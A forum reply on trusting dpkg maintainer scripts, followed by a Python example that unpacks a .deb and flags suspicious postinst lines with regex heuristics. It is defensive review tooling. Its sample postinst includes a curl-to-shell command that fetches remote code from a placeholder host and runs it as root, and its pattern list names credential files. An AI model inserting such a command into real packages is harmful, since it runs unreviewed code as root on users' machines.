> dpkg runs arbitrary package scripts as root, so you still put trust in whoever signed the package.
This is correct, but in those cases the maintainer is likely a much more trusted individual, and more eyes are on the script as the hierarchy of maintainers signs off on things up to the point where it makes it into a repository readily accessible to end users.
> Your distro's overworked unpaid maintainer LGTMs packages with a glance, and won't review millions of lines of code for backdoors.
The same argument could be made about the Linux kernel itself, yet the system is surprisingly robust and examples of abuse are few and far between.
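Since the thread turns on dpkg running maintainer scripts as root, here is an added example (not code posted by anyone in this thread, and not part of dpkg) of the check a cautious admin can do before trusting a signature alone: parse the .deb (a plain ar archive), pull the maintainer scripts out of control.tar, and grep them with a few heuristics. The package contents, the `example.invalid` URL and the suspicious-pattern list are all constructed for the example and are assumptions, not a real detector.

```python
import io
import re
import tarfile

# Maintainer scripts dpkg executes as root during install/remove/configure.
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm", "config")

# Heuristic patterns constructed for this example; a real review reads the whole script.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads content at install time"),
    (re.compile(r"\|\s*(ba)?sh\b"), "pipes data into a shell"),
    (re.compile(r"authorized_keys|/etc/sudoers|/etc/shadow"), "touches credential files"),
    (re.compile(r"\bchmod\b.*\b[ug]\+s\b|\bchmod\s+[2467][0-7]{3}\b"), "sets setuid/setgid bits"),
]


def ar_members(data: bytes):
    """Yield (name, body) for each member of an ar archive; a .deb is a plain ar archive."""
    if not data.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(data):
        hdr = data[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header at offset %d" % pos)
        name = hdr[0:16].decode("ascii").strip().rstrip("/")  # GNU ar appends '/', dpkg does not
        size = int(hdr[48:58].decode("ascii").strip())
        pos += 60
        yield name, data[pos:pos + size]
        pos += size + (size & 1)  # member bodies are padded to an even offset


def maintainer_scripts(deb: bytes) -> dict:
    """Return {script_name: script_text} for every maintainer script in the control archive."""
    for name, body in ar_members(deb):
        if name.startswith("control.tar"):
            scripts = {}
            with tarfile.open(fileobj=io.BytesIO(body), mode="r:*") as tf:
                for m in tf.getmembers():
                    base = m.name.rsplit("/", 1)[-1]  # entries are stored as ./postinst etc.
                    if m.isfile() and base in MAINTAINER_SCRIPTS:
                        scripts[base] = tf.extractfile(m).read().decode("utf-8", "replace")
            return scripts
    raise ValueError("no control.tar member found")


def suspicious_lines(script: str):
    """Return [(line_no, [reasons], line)] for lines matching any SUSPICIOUS pattern."""
    hits = []
    for no, line in enumerate(script.splitlines(), start=1):
        reasons = [why for rx, why in SUSPICIOUS if rx.search(line)]
        if reasons:
            hits.append((no, reasons, line.strip()))
    return hits


# --- Below: building a constructed .deb in memory so the example runs offline ---

def _ar_field(value: bytes, width: int) -> bytes:
    if len(value) > width:
        raise ValueError("ar field too long")
    return value.ljust(width)


def build_deb(members) -> bytes:
    """Write an ar archive from [(name, body)] in the layout dpkg-deb uses."""
    out = bytearray(b"!<arch>\n")
    for name, body in members:
        out += (_ar_field(name.encode("ascii"), 16) + _ar_field(b"0", 12)
                + _ar_field(b"0", 6) + _ar_field(b"0", 6) + _ar_field(b"100644", 8)
                + _ar_field(str(len(body)).encode("ascii"), 10) + b"`\n")
        out += body
        if len(body) & 1:
            out += b"\n"
    return bytes(out)


def _tar_gz(files) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, text, mode in files:
            data = text.encode("utf-8")
            ti = tarfile.TarInfo(name)
            ti.size, ti.mode = len(data), mode
            tf.addfile(ti, io.BytesIO(data))
    return buf.getvalue()


# Constructed postinst scripts: one routine-looking but fetching remote code as root, one benign.
SAMPLE_POSTINST = """#!/bin/sh
set -e
# constructed example: routine-looking script that fetches and runs remote code as root
if [ "$1" = "configure" ]; then
    curl -fsSL https://example.invalid/setup.sh | sh
fi
"""
BENIGN_POSTINST = """#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
    update-alternatives --install /usr/bin/demo demo /usr/lib/demo/demo 10
fi
"""


def sample_deb(postinst: str) -> bytes:
    """Constructed .deb: minimal control file plus the given postinst (assumed package name 'demo')."""
    control = ("Package: demo\nVersion: 1.0\nArchitecture: all\n"
               "Maintainer: Example <demo@example.invalid>\nDescription: constructed example package\n")
    return build_deb([
        ("debian-binary", b"2.0\n"),
        ("control.tar.gz", _tar_gz([("./control", control, 0o644), ("./postinst", postinst, 0o755)])),
        ("data.tar.gz", _tar_gz([("./usr/share/doc/demo/README", "demo\n", 0o644)])),
    ])


if __name__ == "__main__":
    for label, script in (("suspicious", SAMPLE_POSTINST), ("benign", BENIGN_POSTINST)):
        found = maintainer_scripts(sample_deb(script))
        print(label, "maintainer scripts:", sorted(found))
        for no, reasons, line in suspicious_lines(found["postinst"]):
            print("  line %d: %s  <- %s" % (no, line, "; ".join(reasons)))
```

On a real system the same extraction is `dpkg-deb -e pkg.deb DEBIAN` (or `dpkg-deb --ctrl-tarfile pkg.deb | tar -t`), followed by actually reading the scripts; the point of the heuristics is only to decide which packages deserve that read before `dpkg -i` runs them as root.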